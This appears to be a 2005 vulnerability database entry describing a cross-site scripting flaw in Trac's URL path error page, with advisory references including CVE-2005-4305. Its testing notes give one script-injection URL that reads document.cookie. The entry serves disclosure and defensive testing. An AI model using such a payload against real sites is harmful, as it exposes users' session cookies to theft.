Trac URL Path Error Page XSS

2005-12-15T09:03:15
ID OSVDB:21774
Type osvdb
Reporter OSVDB
Modified 2005-12-15T09:03:15

Description

Manual Testing Notes

http://[target]/trac/<script>alert(document.cookie);</script>

References:

Vendor Specific News/Changelog Entry: http://projects.edgewall.com/trac/wiki/ChangeLog Vendor Specific Advisory URL Security Tracker: 1015363 Secunia Advisory ID:18048 Secunia Advisory ID:18625 FrSIRT Advisory: ADV-2005-2936 CVE-2005-4305